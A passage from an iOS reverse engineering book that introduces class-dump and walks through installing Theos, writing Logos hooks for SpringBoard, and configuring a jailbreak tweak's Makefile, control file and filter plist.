Compared with Apps, daemons provide much much lower level functions, accompanying 
with much much greater difficulties reverse engineering them. If you don ’t know what you ’re 
doing for sure, don’ t even try to modify them! It may break your iOS, leading to booting 
failures, so you ’d better stay away from daemons as reverse engineering newbies . After you get 
some experiences  reverse engineering Apps, it ’d be OK for you to challenge daemons. After all, 
it takes more time and energy to reverse a daemon, but great rewards pay off later. The 
community acknowledged “first iPhone call recording App ”, i.e. Audio Recorder, is 
accomplished by reversing mediaserverd.  
2.3   Conclusion 
This chapter simply introduces iOS system hierarchy and file types, which are not 
necessities for App Store developers, who don ’t even have an official way to learn about the 
concepts. This chapter ’s intention is  to introduce you the very important yet undocumented 
system level knowledge, which is essential in iOS reverse engineering.  
In fact, every section in this chapter can be extended into another full chapter, but as 
beginners, knowing what we’ re talking about and what to google when you encounter 
problems during iOS reverse engineering is enough. If you have anything to say, welcome to 
http://bbs.iosre.com .  
 
40  
Tools 
 
 
In the 1st part, we ’ve introduced the basic concepts of iOS reverse engineering. In this part, 
we will introduce the toolkit of iOS reverse engineering.  
Compared with App development, the main feature of iOS reverse engineering is it ’s more 
“mixed ”. When you are writing Apps, mo st work can be done within Xcode, since it is the 
product of Apple, it ’s convenient to download, install and use. As for some other tools and 
plugins, they are just some kind of icing on the cake, thus useful but non- essential . 
But, in iOS reverse engineer ing, we have to face so many complicated tools. Let me make 
an example, there are two dinner tables in front of you, on the first table there ’s simply a pair of 
chopsticks, it ’s named Xcode; the other one is full of knives and forks, in which some of the b ig 
shots are Theos, Reveal, IDA and etc...  
Unlike Xcode, there is no tight connection among those reverse engineering tools; they are 
separated from each other, so we need to integrate them manually. We cannot cover all reverse 
engineering tools in this part , but I think you will have the ability to find and use proper tools 
according to the situation you face when you finish reading this book. You can also share your findings with us on http://bbs.iosre.com.  
Because the tools to be introduced are quite disordered, we split this part to two chapters, 
one is for OSX tools, the other is for iOS. The device used in this part is iPhone 5 with iOS 8.1.  
  
II 
  
 
41  
OSX toolkit 
 
 
Tools used for iOS reverse engineering have different functions, and they play different 
roles. These tools mainly help us develop and debug on OSX. Because of the small screen size of 
iOS devices, they are not suitable for development or debug.  
In this chapter, 4 major tools will be introduced, they ’re class- dump, Theos, Reveal and 
IDA. Other tools are assistants for them. 
3.1   class -dump 
class- dump, as the name indicates, is a tool used for dumping the class information of the 
specified object. It makes use of the runtime mechanism of Objective -C language to extract the 
headers information stored in Mach- O files, and then generates .h files.   
class- dump is simple to use. Firstly, you need to download the latest version from 
http://stevenygard.com/projects/class- dump, as figure 3- 1 shows:  
 
Figure 3- 1 Homepage of class -dump 
After downloading and decompressing class -dump- 3.5.dmg, copy the class -dump executable 
3 
  
 
42 to “/usr/bin” , and run “sudo chmod 777 /usr/bin/class -dump”  in Terminal to grant it execute 
permission. Run class -dump, you will see its usage: 
snakeninnysiMac:~ snakeninny$ class -dump 
class-dump 3.5 (64 bit)  
Usage: class -dump [options] <mach -o-file> 
 
  where options are:  
        -a             show instance variable offsets  
        -A             show implementation addresses  
        --arch <arch>  choose a specific architecture from a universal binary (ppc, 
ppc64, i386, x86_64, armv6, armv7, armv7s, arm64)  
        -C <regex>     only display classes matching regular expression  
        -f <str>       find string in method name  
        -H             generate header files in current directory, or directory 
specified with -o 
        -I             sort classes, categories, an d protocols by inheritance (overrides 
-s) 
        -o <dir>       output directory used for -H 
        -r             recursively expand frameworks and fixed VM shared libraries  
        -s             sort classes and categories by name  
        -S             sort methods by name  
        -t             suppress header in output, for testing  
        --list-arches  list the arches in the file, then exit  
        --sdk-ios      specify iOS SDK version (will look in 
/Developer/Platforms/iPhoneOS.platform/Develope r/SDKs/iPhoneOS<version>.sdk  
        --sdk-mac      specify Mac OS X version (will look in 
/Developer/SDKs/MacOSX<version>.sdk  
        --sdk-root     specify the full SDK root path (or use --sdk-ios/--sdk-mac for a 
shortcut)  
The targets of class -dump are Mach -O binaries, such as library files of frameworks and 
executables of Apps. Now, I will show you an example of how to use class -dump.  
1.   Locate the executable of an App 
First, copy the target App to OSX, as I placed it under “/Users/snakeninny ”. Then go to 
App’s directory in Terminal, and use plutil, the Xcode built -in tool to inspect the 
“CFBundleExecutable ” field in Info.plist:  
snakeninnysiMac:~ snakeninny$ cd /Users/snakeninny/SMSNinja.app/  
snakeninnysiMac:SMSNinja.app snakeninny$  
snakeninnysiMac:SMSNinja.app snakeninny$ plutil -p Info.plist | grep CFBundleExecutable  
  "CFBundleExecutable" => "SMSNinja"  
“SMSNinja ” in the current directory is the executable of the target App.  
2.   class-dump the executable 
class- dump SMSNinja headers to the directory of “ /path/to/headers/SMSNinja/” , and sort 
them by name , as follows: 
 
43 snakeninnysiMac:SMSNinja.app snakeninny$ class -dump -S -s -H SMSNinja -o 
/path/to/headers/SMSNinja/  
Repeat this on your own App, and compare the original headers with class- dump headers, 
aren’ t they very similar? You will see all the methods are nearly the same except that some 
arguments’  types have been changed to id and their names are missing. With “-S” and “ -s” 
options, the headers are even more readable.  
class- dumping our own Apps doesn’ t make much sense; since class- dump works on closed -
source Apps of our own, it can also be used to analyze others ’ Apps.  
From the dumped headers, we can take a peek at the architecture of an App; informati on 
under the skin is the cornerstone of iOS reverse engineering. Now that App sizes have become 
bigger and bigger, more and more third -party libraries are integrated into our own projects, 
class- dump often produces hundreds and thousands of headers. It ’d be a great practice analyzing 
them one by one manually, but that ’s overwhelming workload. In the following chapters, we 
will show you several ways to lighten our workload and focus on the core problems.  
It’s worth mentioning that, Apps downloaded from AppStore are encrypted by Apple, 
executables are “ shelled”  like walnuts, protecting class -dump from working, class -dump will fail 
in this situation. To enable it again, we need other tools to crack the shell at  first, and I’ ll leave 
this to the next chapter. To learn more about class -dump, please refer to http://bbs.iosre.com .  
3.2   Theos  
3.2.1   Introduction to Theos  
Theos is a jailbreak development tool written and shared on GitHub by a  friend, Dustin 
Howett (@DHowett). Compared with other jailbreak development tools, Theos ’ greatest 
feature is simplicity: It ’s simple to download, install, compile and publish; the built -in Logos 
syntax is simple to understand. It greatly reduces our work  besides coding.  
Additionally, iOSOpenDev, which runs as a plugin of Xcode is another frequently used tool 
in jailbreak development, developers who are familiar with Xcode may feel more interested in 
this tool, which is more integrated than Theos. But, rev erse engineering deals with low -level 
knowledge a lot, most of the work can ’t be done automatically by tools, it ’d be better for you to 
get used to a less integrated environment. Therefore I strongly recommend Theos, when you 
use it to finish one practice after another, you will definitely gain a deeper understanding of iOS 
 
44 reverse engineering.  
3.2.2   Install and configure Theos  
1.   Install Xcode and Command Line Tools 
Most iOS developers have already installed Xcode, which contains Command Line Tools. 
For those who don’ t have Xcode yet, please download it from Mac AppStore for free. If two or 
more Xcodes have been installed already, one Xcode should be specified as “active”  by “xcode-
select” , Theos will use this Xcode by default. For example, if 3 Xcodes have been in stalled on 
your Mac, namely Xcode1.app, Xcode2.app and Xcode3.app, and you want to specify Xcode3 as 
active, please use the following command:  
snakeninnys- MacBook:~ snakeninny$ sudo xcode- select - s 
/Applications/Xcode3.app/Contents/Developer  
2.   Download Theos 
Download Theos from GitHub using the following commands:  
snakeninnysiMac:~ snakeninny$ export THEOS=/opt/theos  
snakeninnysiMac:~ snakeninny$ sudo git clone git://github.com/DHowett/theos.git $THEOS  
Password:  
Cloning into '/opt/theos'...  
remote: Counting objects: 4116, done.  
remote: Total 4116 (delta 0), reused 0 (delta 0)  
Receiving objects: 100% (4116/4116), 913.55 KiB | 15.00 KiB/s, done.  
Resolving deltas: 100% (2063/2063), done.  
Checking connectivity... done  
3.   Configure ldid 
ldid is a tool to sign iOS executables; it replaces codesign from Xcode in jailbreak 
development. Download it from http://joedj.net/ldid to “/opt/theos/bin/ ”, then grant it 
execute permission using the following command:  
snakeninnysiMac:~ snakeninny$ sudo chmod 777 /opt/theos/bin/ldid  
4.   Configure CydiaSubstrate 
First run the auto -config script in Theos:  
snakeninnysiMac:~ snakeninny$ sudo /opt/theos/bin/bootstrap.sh substrate  
Password:  
Bootstrapping CydiaSubstrate...  
 Compiling iPhoneOS CydiaSubstrate stub... default target?  
 failed, what?  
 
45  Compiling native CydiaSubstrate stub...  
 Generating substrate.h header...  
Here we ’ll meet a bug that Theos cannot generate a working libsubstrate.dylib, which 
requires our manual fixes. Piece of cake: first search and install CydiaSubstrate in Cydia, as 
shown in figure 3 -2. 
 
Figure 3-  2 CydiaSubstrate  
Then copy “/Library/Frameworks/CydiaSubstrate.framework/CydiaSubstrate ” on iOS to 
somewhere on OSX such as the desktop using iFunBox or scp. Rename it libsubstrate.dylib and 
copy it to “/opt/theos/lib/libsubstrate.dylib ” to replace the invalid file.  
5.   Configure dpkg-deb 
The standard installation package format in jailbreak development is deb, which can be 
manipulated by dpkg- deb. Theos uses dpkg -deb to pack projects to debs.  
Download dm.pl from 
https://raw.githubusercontent.com/DHowett/dm.pl/master/dm.pl , rename it dpkg -deb and 
move it to “/opt/theos/bin/ ”, then grant it execute permission using the following command:  
snakeninnysiMac:~ snakeninny$ sudo chmod 777 /opt/theos/bin/dpkg -deb 

 
46 6.   Configure Theos NIC templates 
It is convenient for us to create various Theos projects because Theos NIC templates have 5 
different Theos project templates. You can also get 5 extra templates from 
https://github.com/DHowett/theos -nic-templates/archive/master.zip  and put the 5 extracted 
.tar files under “ /opt/theos/templates/iphone/ ”. Some default values of NIC can be 
customized, please refer to 
http://iphonedevwiki.net/index.php/NIC#Ho w_to_set_default_values . 
3.2.3   Use Theos  
1.   Create Theos project 
1)   Change Theos ’ working directory to whatever you want (like mine is 
“/User/snakeninny/Code ”), and then enter “/opt/theos/bin/nic.pl”  to start NIC (New 
Instance Creator), as follows:  
snakeninnysiMac:Code snakeninny$ /opt/theos/bin/nic.pl  
NIC 2.0 - New Instance Creator  
------------------------------  
  [1.] iphone/application  
  [2.] iphone/cydget  
  [3.] iphone/framework  
  [4.] iphone/library  
  [5.] iphone/notification_center_widget  
  [6.] iphone/preference_bundle  
  [7.] iphone/sbsettingstoggle  
  [8.] iphone/tool  
  [9.] iphone/tweak  
  [10.] iphone/xpc_service  
There are 10 templates available, among which 1, 4, 6, 8, 9 are Theos embedded, and 2, 3, 5, 
7, 10 are downloaded in the previous  section. At the beginning stage of iOS reverse engineering, 
we’ll be writing tweaks most of the time, usage of other templates can be discussed on 
http://bbs.iosre.com . 
2)   Chose “9” to create a tweak project:  
Choose a Template (required): 9 
3)   Enter the name of the tweak project:  
Project Name (required): iOSREProject  
4)   Enter a bundle identifier as the name of the deb package:  
Package Name [com.yourcompany.iosreproject]: com.iosre.iosreproject  
5)   Enter the name of the tweak author: 
 
47 Author/Maintainer Name [snakeninny]: snakeninny  
6)   Enter “MobileSubstrate Bundle filter ”, i.e. bundle identifier of the tweak target:  
[iphone/tweak] MobileSubstrate Bundle filter [com.apple.springboard]: 
com.apple.springboard  
7)   Enter the name of the process to be killed after tweak installation: 
[iphone/tweak] List of applications to terminate upon installation (space -separated, ' -' 
for none) [SpringBoard]: SpringBoard  
Instantiating iphone/tweak in iosreproject/...  
Done. 
After these 7 simple steps, a folder named iosreproject is created in the current directory, 
which contains the tweak project we just created.  
2.   Customize project files 
It’s convenient to create a tweak project with Theos, but the project is so rough that i t needs 
further polish, more information is required. Anyway, let ’s take a look at our project folder:  
snakeninnysiMac:iosreproject snakeninny$ ls -l 
total 40 
-rw-r--r--  1 snakeninny  staff   184 Dec  3 09:05 Makefile  
-rw-r--r--  1 snakeninny  staff  1045  Dec  3 09:05 Tweak.xm  
-rw-r--r--  1 snakeninny  staff   223 Dec  3 09:05 control  
-rw-r--r--  1 snakeninny  staff    57 Dec  3 09:05 iOSREProject.plist  
lrwxr-xr-x  1 snakeninny  staff    11 Dec  3 09:05 theos -> /opt/theos  
There are only 4 files except one symbolic link pointing to Theos. To be honest, when I first 
created a tweak project with Theos as a newbie, the simplicity of this project actually attracted 
me instead of freaking me out, which surprised me. Less is more, Theos does an amazing job in 
good user experience.  
4 files are enough to build a roughcast house, yet more decoration is needed to make it 
flawless. We ’re going to extend the 4 files for now.  
•  Makefile 
The project files, frameworks and libraries are all specified in Makefile, making the whole 
compile process automatic. The Makefile of iOSREProject is shown as follows:  
include theos/makefiles/common.mk  
 
TWEAK_NAME  = iOSREProject  
iOSREProject_FILES  = Tweak.xm  
 
include $(THEOS_MAKE_PATH)/tweak.mk  
 
after-install::  
 install.exec  "killall  -9 SpringBoard"  
 
48 Let’s do a brief introduction line by line.  
include theos/makefiles/common.mk  
This is a fixed writing pattern, don ’t make changes. 
TWEAK_NAME  = iOSREProject  
The tweak name, i.e. the “Project name ” in NIC when we create a Theos project. It 
corresponds to the “Name ” field of the control file, please don ’t change it.  
iOSREProject_FILES  = Tweak.xm  
Source files of the tweak project, excluding headers; multiple files should be separated by 
spaces, like: 
iOSREProject_FILES  = Tweak.xm  Hook.xm New.x ObjC.m ObjC++.mm  
It can be changed on demand.  
include $(THEOS_MAKE_PATH)/tweak.mk 
According to different types of Theos projects, different .mk files will be included. In the 
beginning stage of iOS reverse eng ineering, 3 types of projects are commonly created, they are 
Application, Tweak and Tool, whose corresponding files are application.mk, tweak.mk and 
tool.mk respectively. It can be changed on demand.  
after-install::  
 install.exec "killall  -9 SpringBoard"  
I guess you know what ’s the purpose of these two lines of code from the literal meaning, 
which is to kill SpringBoard after the tweak is installed during development, and to let 
CydiaSubstrate load the proper dylibs into SpringBoard when it relaunches.  
The content of Makefile seems easy, right? But it ’s too easy to be enough for a real tweak 
project. How do we specify the SDK version? How do we import frameworks? How do we link 
libs? These questions remain to be answered. Don ’t worry, the bread will have of , the milk will 
also have of.  
2  Specify CPU architectures 
export ARCHS = armv7 arm64 
Different CPU architectures should be separated by spaces in the above configuration. Note, 
Apps with arm64 instructions are not compatible with armv7/armv7s dylibs, they have to link 
dylibs of arm64. In the vast majority of cases, just leave it as “armv7 arm64” . 
2  Specify the SDK version 
export TARGET = iphone:compiler:Base  SDK:Deployment  Target 
For example:  
 
49 export TARGET = iphone:clang:8.1:8.0  
It specifies the base SDK version of this project to 8.1, as well deployment target to iOS 8.0. 
We can also speci fy “Base SDK ” to “latest”  to indicate that the project will be compiled with the 
latest SDK of Xcode, like:  
export TARGET = iphone:clang:latest:8.0 
2  Import frameworks 
iOSREProject_FRAMEWORKS  = framework  name 
For example:  
iOSREProject_FRAMEWORKS  = UIKit CoreTelephony  CoreAudio  
There is nothing to explain. However, as tweak developers, how to import private 
frameworks attracts us more for sure. It ’s not much difference to importing documented 
frameworks:  
iOSREProject_PRIVATE_FRAMEWORKS  = private framework  name 
For example:  
iOSREProject_PRIVATE_FRAMEWORKS = AppSupport ChatKit IMCore 
Although it seems to be only one inserted word “ PRIVATE “ , there ’s more to notice. 
Importing private frameworks is not allowed in AppStore development, most of us are not 
familiar with them. Private frameworks change a lot in each iOS version, so before importing 
them, please make sure of the existence of the imported frameworks. For example, if you want 
your tweak to be compatible with both iOS 7 and iOS 8, then Makefile c ould be written as 
follows: 
export ARCHS = armv7 arm64 
export TARGET = iphone:clang:latest:7.0 
 
include theos/makefiles/common.mk  
 
TWEAK_NAME  = iOSREProject  
iOSREProject_FILES  = Tweak.xm  
iOSREProject_PRIVATE_FRAMEWORK  = BaseBoard  
include $(THEOS_MAKE_PATH)/tweak.mk  
 
after-install::  
 install.exec  "killall  -9 SpringBoard"  
This tweak can be compiled and linked successfully without any error. However, 
BaseBoard.framework only exists in SDK of iOS 8 and above, so this tweak would fail to work 
on iOS 7 because of the lack of specified frameworks. In this case, “weak linking ” or dyld series 
functions like dlopen(), dlsym() and dlclose() can solve this problem.  
 
50 2  Link Mach-O Objects 
iOSREProject_LDFLAGS  = -lx 
Theos use GNU Linker to link Mach -O objects, including .dylib, .a and .o files. Input “man 
ld” in Terminal and locate to “-lx”, it is described as follows:  
“-lx         This option  tells the linker  to search for libx.dylib or libx.a in the library  search 
path.  If string  x is of the form  y.o, then that file is searched for in the same places,  but 
without  prepending `lib' or appending `.a' or `.dylib'  to the filename. ” 
As shown in figure 3 -3, all Mach -O objects are named in the formats of “libx.dylib”  and  
“y.o”, who’ re fully compatible with GNU Linker.  
 
Figure 3-  3 Link Mach- O Objects 
So, linking Mach -O objects becomes convenient. For example, if you want to link 
libsqlite3.0.dylib, libz.dylib and dylib1.o, you can do it like this:  
iOSREProject_LDFLAGS  = -lz –lsqlite3.0  –dylib1.o  
There is still one more field to introduce later, but without it Makefile is good to work for 
now. For more Makefile introductions, you can refer to 
http://www.gnu.org/software/make/manual/html_node/Makefiles.html . 
•  Tweak.xm 
The default source file of a tweak project created by Theos is Tweak.xm. “x” in “xm” 

 
51 indicates that this file supports Logos syntax; if this file is suffixed with an only “x”, it means 
Tweak.x will be processed by Logos, then preprocessed and compiled as objective -c; if the suffix 
is “xm”, Tweak.xm will be processed by Logos, then preprocessed and compiled as objective -
c++ , just like the differences between “m” and “ mm”  files.  There are 2 more suffixes as “xi” and 
“xmi” , you can refer to 
http://iphonedevwiki.net/index.php/Logos#File_Extensions_for_Logos for details.  
The default content of Tweak.xm is as follows:  
/* How to Hook with Logos 
Hooks are written with syntax similar to that of an Objective- C @implementation. 
You don't need to #include  <substrate.h>,  it will be done automatically,  as will 
the generation  of a class list and an automatic  constructor.  
 
%hook ClassName  
 
// Hooking a class method 
+ (id)sharedInstance  { 
 return %orig; 
} 
 
// Hooking an instance  method with an argument.  
- (void)messageName:(int)argument  { 
 %log; // Write a message about this call, including  its class, name and arguments,  
to the system log. 
 
 %orig; // Call through to the original  function  with its original  arguments.  
 %orig(nil);  // Call through to the original  function  with a custom argument.  
 
 // If you use %orig(),  you MUST supply all arguments  (except for self and _cmd, 
the automatically  generated  ones.) 
} 
 
// Hooking an instance  method with no arguments.  
- (id)noArguments  { 
 %log; 
 id awesome = %orig; 
 [awesome  doSomethingElse];  
 
 return awesome;  
} 
 
// Always make sure you clean up after yourself;  Not doing so could have grave 
consequences!  
%end 
*/ 
These are the basic Logos syntax, including  3 preprocessor directives: %hook, %log and 
%orig. The next 3 examples show how to use them.  
2  %hook 
%hook specifies the class to be hooked, must end with %end, for example:  
 
52 %hook SpringBoard  
- (void)_menuButtonDown:(id)down  
{      
 NSLog(@"You’ve  pressed home button.");  
 %orig; // call the original  _menuButtonDown:  
} 
%end 
This snippet is to hook [SpringBoard _menuButtonDown:], write something to syslog 
before executing the original method.  
2  %log 
This directive is used inside %hook to write the method argum ents to syslog. We can also 
append anything else with the format of %log([(<type>)<expr>, ...]), for example:  
%hook SpringBoard  
- (void)_menuButtonDown:(id)down  
{      
 %log((NSString  *)@"iOSRE",  (NSString  *)@"Debug");  
 %orig; // call the original  _menuButtonDown:   
} 
%end 
The output is as follows:  
Dec  3 10:57:44  FunMaker -5 SpringBoard[786]:  -[<SpringBoard:  0x150eb800>  
_menuButtonDown:+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
 Timestamp:            75607608282  
 Total Latency:        20266 us 
 SenderID:             0x0000000100000190  
 BuiltIn:              1 
 AttributeDataLength:  16 
 AttributeData:        01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  
 ValueType:            Absolute  
 EventType:            Keyboard  
 UsagePage:            12 
 Usage:               64 
 Down:                1 
 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
 ]: iOSRE, Debug 
2  %orig 
%orig is also used inside %hook; it executes the original hooked method, for example:  
%hook SpringBoard  
- (void)_menuButtonDown:(id)down  
{      
 NSLog(@"You’ve  pressed home button.");  
 %orig; // call the original  _menuButtonDown:  
} 
%end 
If %orig is removed, the original method will not be executed, for example:  
%hook SpringBoard 
- (void)_menuButtonDown:(id)down 
{      
 
53  NSLog(@"You’ve  pressed home button but it’s not functioning.");  
} 
%end 
It can also be used to replace arguments of the original meth od, for example:  
%hook SBLockScreenDateViewController  
- (void)setCustomSubtitleText:(id)arg1  withColor:(id)arg2  
{ 
 %orig(@"iOS  8 App Reverse Engineering",  arg2); 
} 
%end 
The lock screen looks like figure 3 -4 with the new argument:  
 
Figure 3-  4 Hack the lock screen  
Besides %hook, %log and %orig, there are other common preprocessor directives such as 
%group, %init, %ctor, %new and %c.  
2  %group 
This directive is used to group %hook directives for better code management and 
conditional initialization (We ’ll talk about this soon). %group must end with %end, one %group 
can contain multiple %hooks, all %hooks that do not belong to user -specific groups will be 
grouped into %group _ungrouped. For example:  
%group iOS7Hook 
%hook iOS7Class 
- (id)iOS7Method  
{ 
 id result = %orig; 

 
54  NSLog(@"This  class & method only exist in iOS 7."); 
 return result; 
} 
%end 
%end // iOS7Hook  
 
%group iOS8Hook  
%hook iOS8Class  
- (id)iOS8Method  
{ 
 id result = %orig; 
 NSLog(@"This  class & method only exist in iOS 8."); 
 return result; 
} 
%end 
%end // iOS8Hook  
 
%hook SpringBoard  
-(void)powerDown  
{ 
 %orig; 
} 
%end 
Inside %group iOS7Hook, it hooks [iOS7Class iOS7Method]; inside %group iOS8Hook, it 
hooks [iOS8Class iOS8Method]; and inside % group _ungrouped, it hooks [SpringBoard 
powerDown]. Can you get it?  
Notice, %group will only work with %init.  
2  %init 
This directive is used for %group initialization; it must be called inside %hook or %ctor. If a 
group name is specified, it will initialize %group SpecifiedGroupName, or it will initialize %group _ungrouped, for example:  
#ifndef kCFCoreFoundationVersionNumber_iOS_8_0  
#define kCFCoreFoundationVersionNumber_iOS_8_0  1140.10 
#endif  
 
%hook SpringBoard  
- (void)applicationDidFinishLaunching:(id)application  
{ 
 %orig; 
 
 %init; // Equals to %init(_ungrouped)  
 if (kCFCoreFoundationVersionNumber  >= kCFCoreFoundationVersionNumber_iOS_7_0  && 
kCFCoreFoundationVersionNumber  < 
kCFCoreFoundationVersionNumber_iOS_8_0)  %init(iOS7Hook);  
 if (kCFCoreFoundationVersionNumber  >= kCFCoreFoundationVersionNumb er_iOS_8_0)  
init(iOS8Hook);  
} 
%end 
Please remember, a %group will only take effect with a corresponding %init.  
 
55 2  %ctor 
The constructor of a tweak, it is the first function to be called in the tweak. If we don ’t 
define a constructor explicitly, Theos will create one for us automatically, and call 
%init(_ungrouped) inside it.  
%hook SpringBoard  
- (void)reboot  
{ 
 NSLog(@"If  rebooting  doesn’t work then I’m screwed.");  
 %orig; 
} 
%end 
The above code works fine, because Theos has called %init implicitly like this: 
%ctor 
{ 
 %init(_ungrouped);  
} 
However,  
%hook SpringBoard  
- (void)reboot  
{ 
 NSLog(@"If  rebooting  doesn’t work then I’m screwed.");  
 %orig; 
} 
%end 
 
%ctor 
{ 
 // Need to call %init explicitly!  
} 
This %hook never works, because we ’ve defined %ctor explicitly without calling %init 
explicitly, there lacks a %group(_ungrouped). Generally, %ctor is used to call %init and 
MSHookFunction, for example:  
#ifndef kCFCoreFoundationVersionNumber_iOS_8_0  
#define kCFCoreFoundationVersionNumber_iOS_8_0  1140.10 
#endif  
 
%ctor 
{ 
 %init; 
 if (kCFCoreFoundationVersionNumber  >= kCFCoreFoundationVersionNumber_iOS_7_0  && 
kCFCoreFoundationVersionNumber  < 
kCFCoreFoundationVersionNumber_iOS_8_0)  %init(iOS7Hook);  
 if (kCFCoreFoundationVersionNumber  >= 
kCFCoreFoundationVersionNumber_iOS_8_0)  %init(iOS8Hook);  
 MSHookFunction((void  *)&AudioServicesPlaySystemSound,  
  (void *)&replaced_AudioServicesPlaySystemSound,  
  (void **)&original_AudioServicesPlaySystemSound);  
} 
Attention, %ctor doesn ’t end with %end.  
 
56 2  %new 
%new is used inside %hook to add a new method to an existing class; it ’s the same as 
class_addMethod, for example:  
%hook SpringBoard  
%new 
- (void)namespaceNewMethod  
{ 
 NSLog(@"We’ve  added a new method to SpringBoard.");  
} 
%end 
Some of you may wonder, category  in Objective -C can already add  new methods to classes, 
why do we still need %new? The difference between category and %new is that the former is 
static while the latter is dynamic. Well, does static adding or dynamic adding matter? Yes, 
especially when the class to be added is from a certain executable, it matters. For example, the 
above code adds a new method to SpringBoard. If we use category, the code should look like 
this: 
@interface  SpringBoard  (iOSRE) 
- (void)namespaceNewMethod;  
@end 
 
@implementation  SpringBoard  (iOSRE) 
- (void)namespaceNewMethod  
{ 
 NSLog(@"We’ve  added a new method to SpringBoard.");  
} 
@end 
We will get “error: cannot find interface declaration for ‘SpringBoard’ ” when trying to 
compile the above code, which indicates that the compiler cannot find the definition of 
SpringBoard. We can compose a SpringBoard class to cheat the compiler:  
@interface  SpringBoard  : NSObject  
@end 
 
@interface  SpringBoard  (iOSRE) 
- (void)na mespaceNewMethod;  
@end 
 
@implementation  SpringBoard  (iOSRE) 
- (void)namespaceNewMethod  
{ 
 NSLog(@"We’ve  added a new method to SpringBoard.");  
} 
@end 
Recompile it, we ’ll still get the following error: 
Undefined symbols for architecture armv7: 
  "_OBJC_CLASS_$_SpringBoard", referenced from: 
      l_OBJC_$_CATEGORY_SpringBoard_$_iOSRE  in Tweak.xm.b1748661.o  
 
57 ld: symbol(s)  not found for architecture  armv7 
clang: error: linker command failed with exit code 1 (use -v to see invocation)  
ld cannot find the definition of SpringBoard. Normally, when there ’s “symbol(s) not found ”, 
most of you may think, if this is because I forget to import any framework? But, SpringBoard is a 
class of SpringBoard.app rather than a framework, how do we import an execut able? I bet you 
know %new ’s usage right now.  
2  %c 
This directive is equal to objc_getClass or NSClassFromString, it is used in %hook or %ctor 
to dynamically get a class by name.  
Other Logos preprocessor directives including %subclass and %config are seldom u sed, at 
least I myself have never used them before. Nonetheless, if you ’re interested in them, you can 
refer to http://iphonedevwiki.net/index.php/Logos, or go to http://bbs.iosre.com  for 
discussion.  
•  control 
The contents of control file are basic information of the current deb package; they will be 
packed into the deb package. The contents of iOSREProject ’s control file are shown as follows:  
Package:  com.iosre.iosreproject  
Name: iOSREProject  
Depends:  mobilesubstrate  
Version:  0.0.1 
Architecture:  iphoneos -arm 
Description:  An awesome MobileSubstrate  tweak! 
Maintainer:  snakeninny  
Author: snakeninny  
Section:  Tweaks 
Let me give a brief introduction of this file.  
2  Package field is the name of the deb package, it has the similar naming convention to bundle 
identifier, i.e. reverse DNS format. It can be changed on demand.  
2  Name field is used to describe the name of the project; it also can be changed.  
2  Depends field is used to describe the dependency of this deb package. Dependency means the basic 
condition to run this tweak, if the current environment does not meet the condition described in depends field, this tweak cannot run properly. For example, the following code means the tweak must run on iOS 8.0 or later with CydiaSubstrate installed. 
Depends:  mobilesubstrate,  firmware  (>= 8.0) 
2  Version field is used to describe the version of the deb package; it can be changed on demand.  
 
58 2  Architecture field is used to describe the target device architecture, do not change  it. 
2  Description field is used to give a brief introduction of the deb package; it can be changed on 
demand. 
2  Maintainer field is used to describe the maintainer of the deb package, say, all deb packages on TheBigBoss are maintained by BigBoss instead of th e author. This field can be changed on demand. 
2  Author field is used to describe the author of the tweak, which is different from the maintainer. It can be changed on demand. 
2  Section field is used to describe the program type of the deb package, don ’t change it. 
There are still some other fields in control file, but the above fields are enough for Theos 
projects. For more information, please refer to the official site of debian, 
http://www.debian.org/doc/debian -policy/ch- controlfields.html , or control files in other deb 
packages. It ’s worth mentioning that Theos will further edit control file when packaging:  
Package:  com.iosre.iosreproject  
Name: iOSREProject  
Depends:  mobilesubstrate  
Architecture:  iphoneos -arm 
Description:  An awesome MobileSubstrate  tweak! 
Maintainer:  snakeninny  
Author: snakeninny  
Section:  Tweaks 
Version:  0.0.1-1 
Installed -Size: 104 
During editing, Theos changes the Version field to indicate packaging times; adds an 
Installed -Size field to indicate the size of the package. This size may not be exactly the same to 
the actual size, but don’ t change it.  
The information of control file will show in Cydia directly, as shown in figure 3 -5: 
 
59  
Figure 3-  5 Control informaton in Cydia  
•  iOSREProject.plist 
This plist file has the similar function to Info.plist of an App, which records some 
configuration information. Specifically in a tweak, it describes the functioning scope of the 
tweak. It can be edited with plutil or Xcode.  
iOSREProject.plist consists of a “Root ” dictionary, which has a key named “Filter” , as 
shown in figure 3 -6: 
 
Figure 3-  6 iOSREProject.plist  
There ’s a series of arrays under “Filter” , which can be categorized into 3 types.  
2   “Bundles” specifies several bundles as the tweak’s targets, as shown in figure 3-7. 
 

60 Figure 3-  7 Bundles 
According to figure 3 -7, this tweak targets 3 bundles, i.e. SMSNinja, 
AddressBook.framework and SpringBoard.  
2   “Classes” specifies several classes as the tweak’s targets, as shown in figure 3-8.  
 
Figure 3-  8 Classes 
According to figure 3 -8, this tweak targets 3 classes, i.e. NSString, SBAwayController and 
SBIconModel.  
2  “Executables” specifies several executables as the tweak ’s targets, as shown in figure 3-9.  
 
Figure 3-  9 Executables  
According to figure 3 -9, this tweak targets 3 executables, i.e. callservicesd, imagent and 
mediaserverd.  
These 3 types can be used together, as shown in figure 3 -10. 

 
61  
Figure 3-  10 A Mix -targeted tweak 
Attention, when there ’re different kinds of arrays in “Filter” , we have to add an extra “Mode 
: Any ”  key- value pair.  
3.   Compile + Package + Install 
We’ve installed Theos, created our first tweak project via NIC, and gone over all project 
files. In the end, we must compile the tweak and install it on iOS to start experi encing “ safe 
mode ” again and again. Are you excited?  
•  Compile 
 “make ” command is used to compile Theos project. Just run “make ” under our Theos 
project directory:  
snakeninnysiMac:iosreproject  snakeninny$  make 
Making all for tweak iOSREProject...  
 Preprocessing  Tweak.xm...  
 Compiling  Tweak.xm...  
 Linking tweak iOSREProject...  
 Stripping  iOSREProject...  
 Signing iOSREProject...  
From the output, we know Theos has finished preprocessing, compiling, linking, stripping 
and signing. After that, an “obj” folder appears in the current folder.  
snakeninnysiMac:iosreproject  snakeninny$  ls -l 
total 32 
-rw-r--r--  1 snakeninny   staff  262 Dec  3 09:20 Makefile  
-rw-r--r--  1 snakeninny   staff    0 Dec  3 11:28 Tweak.xm  
-rw-r--r--  1 snakeninny   staff  223 Dec  3 09:05 control 
-rw-r--r--@ 1 snakeninny   staff  175 Dec  3 09:48 iOSREProject.plist  
drwxr-xr-x  5 snakeninny   staff  170 Dec  3 11:28 obj 
